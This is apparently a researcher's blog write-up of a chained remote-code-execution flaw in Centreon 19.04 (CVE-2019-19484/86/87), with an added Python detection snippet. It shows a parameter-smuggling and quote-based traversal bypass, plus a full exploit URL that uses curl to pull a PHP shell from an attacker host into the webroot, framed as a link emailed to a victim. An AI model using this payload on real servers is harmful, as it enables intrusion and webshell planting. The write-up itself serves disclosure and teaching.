“As a matter of fact, yeah, they were foolproof. The problem is that you don’t have to protect yourself against fools. You have to protect yourself against people like me.”
― Jeffery Deaver

Undisclosed CVE-2019-19484, CVE-2019-19486, CVE-2019-19487

mucomplex
Jan 11

Last year, in October 2019, one week after the Centreon 19.04 release (version of Oct. 16, 2019), I managed to find a few vulnerabilities that, chained together, produce remote code execution (RCE). I also explain the methods and techniques for discovering new vulnerabilities in my 0-day class; it can serve as OSWE preparation before taking the real exam. The other vulnerabilities will not be disclosed here because the technique is complex and needs a long explanation. In this article I will just point out the mistakes the programmer made.

URL Redirect

On line 119 (./include/core/login/login.php), the parameter “p” is a kind of hidden parameter.

Let us look at an example:

Admin login with parameter “p”.
Result after successful login to the main page: parameter “p” remains in the URL.
Passing parameters “p” and “p2” joined with “&”.
Parameter “p2” does not appear.
Now we encode our ‘&’ as ‘%26’.
As a result, we successfully pass the parameter. This information will be used later.

Now we look into the “configuration/configObject/command/minPlayCommand.php” file. This file implements a lot of sanitization, but I still managed to bypass it. The security check for this code was implemented on 3 Jan 2019:

https://github.com/centreon/centreon/pull/7099

On line 43, we can't use the trick of encoding our URL, because it decodes it. Line 47 is the replacement of the $command value.

Lines 140 to 143 are the path check. Line 144 checks for directory traversal by looking for ‘/../’. On line 147, escapeshellcmd is applied.

To conclude: I need to get past urldecode, str_replace, the path check, the directory traversal check and escapeshellcmd. This might look scary to a hacker, but it is still possible to bypass. Remember my article about security bypasses? You can still bypass a directory traversal check by adding double quotes or single quotes, like this: (‘ /.’’./ ‘) and (‘ /.””./’). So we are able to bypass the hard-coded directory traversal check. Wait... but we need to bypass escapeshellcmd too, right?

If you read the documentation carefully: “escapeshellcmd() escapes the following characters with a backslash: &#;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired.” Did we pair our ‘ and “ in the directory traversal? If yes, it means we are bypassing escapeshellcmd too!
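Added example, not Centreon's code and not from the original post: a defender-side check that tests for traversal on the command_line value as the shell will see it (after quote removal), beside the literal ‘/../’ check the post describes, plus parsing of an access-log line to surface the parameters smuggled through ‘p’ with an encoded ‘&’ as shown in the URL Redirect section. The log line, its IP address and the /bin/true command are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log line in the shape of the request the post describes
# (placeholder IP; a harmless command stands in for the real payload).
SAMPLE_LOG = ('203.0.113.7 - - [11/Jan/2020:10:00:00 +0000] "GET /centreon/index.php'
              "?p=60801%26command_line=%24USER1%24/.''./.''./bin/true%26o=p%26min=1"
              ' HTTP/1.1" 200 512')
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')


def naive_traversal_check(value: str) -> bool:
    """The literal check the post describes: fires only on a plain '/../'."""
    return "/../" in value


def shell_normalize(value: str) -> str:
    """Approximate the shell's quote removal: /.''./ and /'..'/ both run as /../.
    Deleting every quote over-approximates (backslash escapes are ignored),
    which is the safe direction for a reject decision."""
    return value.replace("'", "").replace('"', "")


def hardened_traversal_check(value: str) -> bool:
    """Check traversal on the value as the shell will execute it, not as typed."""
    norm = shell_normalize(value)
    return "/../" in norm or norm.startswith("../") or norm.endswith("/..")


def smuggled_params(url: str) -> dict:
    """Parameters hidden inside 'p' via %26: the application's own urldecode()
    of the 'p' value turns the encoded '&' into a real separator."""
    hidden = {}
    for p in parse_qs(urlsplit(url).query, keep_blank_values=True).get("p", []):
        if "&" in p:  # only present when the client sent %26 inside p
            hidden.update({k: v[0] for k, v in parse_qs(p, keep_blank_values=True).items()})
    return hidden


def analyze_request(log_line: str) -> dict:
    """Flag a request whose 'p' carries smuggled parameters or a disguised traversal."""
    m = REQUEST_TARGET.search(log_line)
    hidden = smuggled_params(m.group("target")) if m else {}
    return {"smuggled": hidden,
            "traversal": hardened_traversal_check(hidden.get("command_line", ""))}


if __name__ == "__main__":
    print(analyze_request(SAMPLE_LOG))
```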

Now let's feed it a crafted payload that executes “whoami”. You will see that the output is “apache”.

I'm disguising the PHP shell payload as update.txt so it does not look suspicious, as below. This link will be sent to the victim via email:

http://Targets_IP/centreon/index.php?p=60801%26command_line=$USER1$/.''./.''./.''./.''./.''./.''./bin/curl http://Attacker_IP/update.txt -o /usr/share/centreon/www/update.php%26o=p%26min=1

If successful, the status will be “OK”.

Finally, I successfully uploaded my payload.

If netcat is installed on the target machine:

After contacting the vendor, this was fixed in Centreon Web 19.04.5; Centreon 19.04.4 and below are affected. I hope the security issue here was worth learning about. Thanks.

Thanks to my friend Luqman Hakim Zahari for pointing out this application and attack vector after he played HackTheBox.
